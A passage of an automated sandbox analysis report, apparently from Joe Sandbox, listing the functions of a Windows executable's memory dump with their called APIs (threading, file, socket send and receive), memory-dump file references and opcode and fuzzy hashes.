                                                                                                                                      • Part of subcall function 0040DCD0: CloseHandle.KERNEL32(?), ref: 0040DD29
                                                                                                                                    • CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040DC5F
                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040DC9C
                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040DCA7
                                                                                                                                    • DuplicateHandle.KERNEL32(00000000), ref: 0040DCAE
                                                                                                                                    • LeaveCriticalSection.KERNEL32(-00000004), ref: 0040DCC2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalCurrentHandleProcessSection$CloseCreateDuplicateEnterLeaveObjectSingleThreadWait
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2251373460-0
                                                                                                                                    • Opcode ID: 2e6c4f739912ed2bc0a02cfb396969f5dbba436efce4c3680658a262bb647ab9
                                                                                                                                    • Instruction ID: 271f69a92097b1b74c70525479ef463fb32d1143369d808ec26f6a45d53993ac
                                                                                                                                    • Opcode Fuzzy Hash: 2e6c4f739912ed2bc0a02cfb396969f5dbba436efce4c3680658a262bb647ab9
                                                                                                                                    • Instruction Fuzzy Hash: 8D31FA74A00208EFDB04DF98D889B9E7BB5EF48314F0085A8E906A7391D774EA95CF94
                                                                                                                                    Function 00407720 Relevance: 9.1, APIs: 6, Instructions: 65sleepCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Sleep$CountTickrandsrand
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3488799664-0
                                                                                                                                    • Opcode ID: c4b67ad1fad57f8bcb632e0803aeb8977b8bb7c39f14d193e10d0355081e485a
                                                                                                                                    • Instruction ID: d526f444081091d18ff5343ef40ffd9a09f2c1e6f6858c3ecb06089bc02b22b2
                                                                                                                                    • Opcode Fuzzy Hash: c4b67ad1fad57f8bcb632e0803aeb8977b8bb7c39f14d193e10d0355081e485a
                                                                                                                                    • Instruction Fuzzy Hash: 1F21A479E00208FBC704DF60D885AAE7B31AB45304F10C47AE9026B381D679BA80CB56
                                                                                                                                    Function 00409860 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _allshl_aullshr
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 673498613-0
                                                                                                                                    • Opcode ID: 676eacc0c821b4ee5133c352ae25f7f86d1fbe8fb33d794599ac5fe58c8be501
                                                                                                                                    • Instruction ID: 526ada65c8064deb58b6c5f7a60763359622b06b1071bb594fb8502c37df64e6
                                                                                                                                    • Opcode Fuzzy Hash: 676eacc0c821b4ee5133c352ae25f7f86d1fbe8fb33d794599ac5fe58c8be501
                                                                                                                                    • Instruction Fuzzy Hash: C1111F32600618AB8B10EF5EC4426CABBD6EF84361B25C136FC2CDF359D634DA454BD8
                                                                                                                                    Function 00401200 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 106networkCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • memcpy.NTDLL(00000004,00000000,?,?), ref: 00401258
                                                                                                                                    • htons.WS2_32(?), ref: 00401281
                                                                                                                                    • sendto.WS2_32(?,00000000,?,00000000,?,00000010), ref: 004012A9
                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004012BE
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ExchangeInterlockedhtonsmemcpysendto
                                                                                                                                    • String ID: pdu
                                                                                                                                    • API String ID: 2164660128-2320407122
                                                                                                                                    • Opcode ID: 40dba2aff78ba806bae8a6d526fcd496496bfc60c7e892d92015a678719dcbf9
                                                                                                                                    • Instruction ID: 05dd75d8116292c76d11c3cc90d45d23dbf78b8bb9632d9a28891a4d74dcab7a
                                                                                                                                    • Opcode Fuzzy Hash: 40dba2aff78ba806bae8a6d526fcd496496bfc60c7e892d92015a678719dcbf9
                                                                                                                                    • Instruction Fuzzy Hash: 0731B3762083009BC710DF69D880A9BBBF4AFC9714F04457EFD9897381D6349914C7AB
                                                                                                                                    Function 00406360 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetDriveTypeW.KERNEL32(?c@), ref: 0040636D
                                                                                                                                    • QueryDosDeviceW.KERNEL32(?c@,?,00000208), ref: 004063AC
                                                                                                                                    • StrCmpNW.SHLWAPI(?,\??\,00000004), ref: 004063C4
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: DeviceDriveQueryType
                                                                                                                                    • String ID: ?c@$\??\
                                                                                                                                    • API String ID: 1681518211-744975932
                                                                                                                                    • Opcode ID: f7d2f09f959af449ec867411dc7ba934a04d8b9c93c7b8ac7040ad7b5d155416
                                                                                                                                    • Instruction ID: e6efffa98ab35b62633249d18dd791fc9affcc5f03e1fdb0b50d0aac4f7d71b0
                                                                                                                                    • Opcode Fuzzy Hash: f7d2f09f959af449ec867411dc7ba934a04d8b9c93c7b8ac7040ad7b5d155416
                                                                                                                                    • Instruction Fuzzy Hash: 6101F474A4021CEBCB20CF55DD497DD7774AB04714F00C0BAAA06A7280D6759FD5CF99
                                                                                                                                    Function 00401820 Relevance: 7.6, APIs: 5, Instructions: 116COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401846
                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 004018B1
                                                                                                                                      • Part of subcall function 004017A0: EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                                                                                                                      • Part of subcall function 004017A0: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                                                                                                                      • Part of subcall function 004017A0: LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Interlocked$CriticalExchangeSection$DecrementEnterLeave
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3966618661-0
                                                                                                                                    • Opcode ID: c65f9457ed9e15c383df9cb8ba30375030b5d01632cb0b7646eecf1c4dd6c2f0
                                                                                                                                    • Instruction ID: 3b152336b57d45bd484518126aaa8069a8e5b95e48398e5ac574b9fb36890b51
                                                                                                                                    • Opcode Fuzzy Hash: c65f9457ed9e15c383df9cb8ba30375030b5d01632cb0b7646eecf1c4dd6c2f0
                                                                                                                                    • Instruction Fuzzy Hash: 8C41C371A00A02ABC714AB399848793F3A4BF84310F14823AE82D93391E739B855CB99
                                                                                                                                    Function 0040B530 Relevance: 7.6, APIs: 5, Instructions: 74fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CreateFileW.KERNEL32(004163E0,40000000,00000000,00000000,00000002,00000002,00000000), ref: 0040B5C8
                                                                                                                                    • WriteFile.KERNEL32(000000FF,00000000,?,?,00000000), ref: 0040B5E9
                                                                                                                                    • FlushFileBuffers.KERNEL32(000000FF), ref: 0040B5F3
                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040B5FD
                                                                                                                                    • InterlockedExchange.KERNEL32(00414FB0,0000003D), ref: 0040B60A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$BuffersCloseCreateExchangeFlushHandleInterlockedWrite
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 442028454-0
                                                                                                                                    • Opcode ID: f5b45801421cf4693db4a952f6c7f3d93a7964b949aee7b1e37d5bd3e27ea16a
                                                                                                                                    • Instruction ID: a0ca425d267a8141d5e1d1f6c90da30668f0d4feb664184cc2dbb6b4fe126232
                                                                                                                                    • Opcode Fuzzy Hash: f5b45801421cf4693db4a952f6c7f3d93a7964b949aee7b1e37d5bd3e27ea16a
                                                                                                                                    • Instruction Fuzzy Hash: 93312BB4A00208EBCB14DF94DC45FAEB775FB88304F208969E51567390D775AA41CF99
                                                                                                                                    Function 00409440 Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _allshl
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 435966717-0
                                                                                                                                    • Opcode ID: d5e550ec765fb5e4c7b4ab991364e2b02bfb294b8b2cc5675fd73cc28fc319ee
                                                                                                                                    • Instruction ID: d897fcd8a6e9f4a7bfe0dcf07208541f34cf8f45c30d72ee7b1e381ef02b65f1
                                                                                                                                    • Opcode Fuzzy Hash: d5e550ec765fb5e4c7b4ab991364e2b02bfb294b8b2cc5675fd73cc28fc319ee
                                                                                                                                    • Instruction Fuzzy Hash: D2F03672D015289B9710FEEF84424CAFBE59F89354B21C176F818E3360E6709E0946F1
                                                                                                                                    Function 00401330 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42synchronizationCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SetEvent.KERNEL32(?,00000000,?,0040154C,00000000), ref: 00401346
                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00401352
                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040135C
                                                                                                                                      • Part of subcall function 0040AB60: HeapFree.KERNEL32(?,00000000,00402612,?,00402612,?), ref: 0040ABBB
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseEventFreeHandleHeapObjectSingleWait
                                                                                                                                    • String ID: pdu
                                                                                                                                    • API String ID: 309973729-2320407122
                                                                                                                                    • Opcode ID: b5e20e1ff81c8238d4906aefd24b36edb0459e4a4963a0916b72258a76a9c2c1
                                                                                                                                    • Instruction ID: d5c9189d357da9e52bb83819b3173fb4210b6dfc4c93b70417a9898bc2e8bd9b
                                                                                                                                    • Opcode Fuzzy Hash: b5e20e1ff81c8238d4906aefd24b36edb0459e4a4963a0916b72258a76a9c2c1
                                                                                                                                    • Instruction Fuzzy Hash: 3D0186765003109BCB20AF66ECC4E9B7779AF48711B044679FD056B396C738E85087A9
                                                                                                                                    Function 00401100 Relevance: 6.1, APIs: 4, Instructions: 86synchronizationCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • ioctlsocket.WS2_32 ref: 0040112B
                                                                                                                                    • recvfrom.WS2_32 ref: 0040119C
                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004011B2
                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000001), ref: 004011D3
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ExchangeInterlockedObjectSingleWaitioctlsocketrecvfrom
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3980219359-0
                                                                                                                                    • Opcode ID: df0982d8961dfa7a6cd0b7929aac86f273bc3c16a843d5198fc6f9dd533ca4c4
                                                                                                                                    • Instruction ID: daf299aa3b87b71fb70ff151311bbfa052327c8c190f043936f27822c7d74034
                                                                                                                                    • Opcode Fuzzy Hash: df0982d8961dfa7a6cd0b7929aac86f273bc3c16a843d5198fc6f9dd533ca4c4
                                                                                                                                    • Instruction Fuzzy Hash: 1621C3B1504301AFD304DF65DC84A6BB7E9EF88314F004A3EF559A6290E774D94887EA
                                                                                                                                    Function 00401F50 Relevance: 6.1, APIs: 4, Instructions: 73networkCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401F83
                                                                                                                                    • WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 00401FAF
                                                                                                                                    • WSAGetLastError.WS2_32 ref: 00401FB9
                                                                                                                                    • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401FF9
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CompletionQueuedStatus$ErrorLastOverlappedResult
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2074799992-0
                                                                                                                                    • Opcode ID: 0873c704f9b42db8694245f3ff021b9bdebcd9b4b0cbd7409a356cfb69af86d5
                                                                                                                                    • Instruction ID: 923efa3f85c100d8dcf87aa4bb405070ff806fabc372267044aefe38fa55a991
                                                                                                                                    • Opcode Fuzzy Hash: 0873c704f9b42db8694245f3ff021b9bdebcd9b4b0cbd7409a356cfb69af86d5
                                                                                                                                    • Instruction Fuzzy Hash: B72131715083119BC200DF55D844D6BB7E8BFCCB54F044A2DF598A3291D774EA49CBAA
                                                                                                                                    Function 00401C50 Relevance: 6.1, APIs: 4, Instructions: 59networksleepCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401C88
                                                                                                                                    • WSAGetLastError.WS2_32(?,?,004021A5,00000000), ref: 00401C90
                                                                                                                                    • Sleep.KERNEL32(00000001,?,?,004021A5,00000000), ref: 00401CA6
                                                                                                                                    • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401CCC
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Recv$ErrorLastSleep
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3668019968-0
                                                                                                                                    • Opcode ID: 632ea2d54cc4383f5132f6b2993607fdd6e2119cf45a08eb7173c4bd646593aa
                                                                                                                                    • Instruction ID: 470b9b0004fc9485880b3b0232d8394a6163a25caab740c915041083b8486df8
                                                                                                                                    • Opcode Fuzzy Hash: 632ea2d54cc4383f5132f6b2993607fdd6e2119cf45a08eb7173c4bd646593aa
                                                                                                                                    • Instruction Fuzzy Hash: 8811AD72148305AFD310CF65EC84AEBB7ECEB88710F40092EF945D2150E6B9E949A7B6
                                                                                                                                    Function 00401AE0 Relevance: 6.0, APIs: 4, Instructions: 49networksleepCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B0C
                                                                                                                                    • WSAGetLastError.WS2_32 ref: 00401B12
                                                                                                                                    • Sleep.KERNEL32(00000001), ref: 00401B28
                                                                                                                                    • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B4A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Send$ErrorLastSleep
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2121970615-0
                                                                                                                                    • Opcode ID: b06a38cb9fde64199f830136d194dacddc283b62bd49c201cde61758c607cabc
                                                                                                                                    • Instruction ID: 56798eeddd779857b304cdb020dc52eae5646efd672cabe94dca1e5c1b4e91c2
                                                                                                                                    • Opcode Fuzzy Hash: b06a38cb9fde64199f830136d194dacddc283b62bd49c201cde61758c607cabc
                                                                                                                                    • Instruction Fuzzy Hash: 90014B712483046EE7209B96DC88F9B77A8EBC8711F408429F608DA2D0D7B5A9459B7A
                                                                                                                                    Function 0040DE90 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 0040DEA9
                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0040DED8
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0040DEE7
                                                                                                                                    • DeleteCriticalSection.KERNEL32(?), ref: 0040DEF4
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalSection$CloseDeleteEnterHandleLeave
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3102160386-0
                                                                                                                                    • Opcode ID: bb7e0bdf7f07b64480a2601e76dd0e203c57d6389b493651e08ccb706d318709
                                                                                                                                    • Instruction ID: ac11750a047aba6f79e7b8cc85f80e728fdbf261864cbbb5073f4aff0768140e
                                                                                                                                    • Opcode Fuzzy Hash: bb7e0bdf7f07b64480a2601e76dd0e203c57d6389b493651e08ccb706d318709
                                                                                                                                    • Instruction Fuzzy Hash: 65115E74D00208EBDB08DF94D984A9DBB75FF48309F1081A9E806AB341D734EE94DB89
                                                                                                                                    Function 004017A0 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 00401808
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2223660684-0
                                                                                                                                    • Opcode ID: 3a256af2c019b276b8838bcc1186c61ecce618c98c01d702573358750c80b1c1
                                                                                                                                    • Instruction ID: dfa7cd44099aa032f197b32b6ae0ce93fcebf173881def012ca395fa41330849
                                                                                                                                    • Opcode Fuzzy Hash: 3a256af2c019b276b8838bcc1186c61ecce618c98c01d702573358750c80b1c1
                                                                                                                                    • Instruction Fuzzy Hash: BD01F7356423049FC3209F26EC44ADB77F8AF49712B04443EE50693650DB34F545DB28
                                                                                                                                    Function 00407390 Relevance: 6.0, APIs: 4, Instructions: 22memoryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CoInitializeEx.OLE32(00000000,00000002,?,?,004083D7), ref: 00407398
                                                                                                                                    • SysAllocString.OLEAUT32(004161D0), ref: 004073A3
                                                                                                                                    • CoUninitialize.OLE32 ref: 004073C8
                                                                                                                                      • Part of subcall function 004073E0: SysFreeString.OLEAUT32(00000000), ref: 004075F8
                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 004073C2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: String$Free$AllocInitializeUninitialize
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 459949847-0
                                                                                                                                    • Opcode ID: d549018ca7281a3a12c42c42db4c5aa0698fc19bb076c2a4b3e2f7f0a4b3168e
                                                                                                                                    • Instruction ID: 94d3ecd3e534f0c2973a063d63be5db40503c7f445082467247c405133df6831
                                                                                                                                    • Opcode Fuzzy Hash: d549018ca7281a3a12c42c42db4c5aa0698fc19bb076c2a4b3e2f7f0a4b3168e
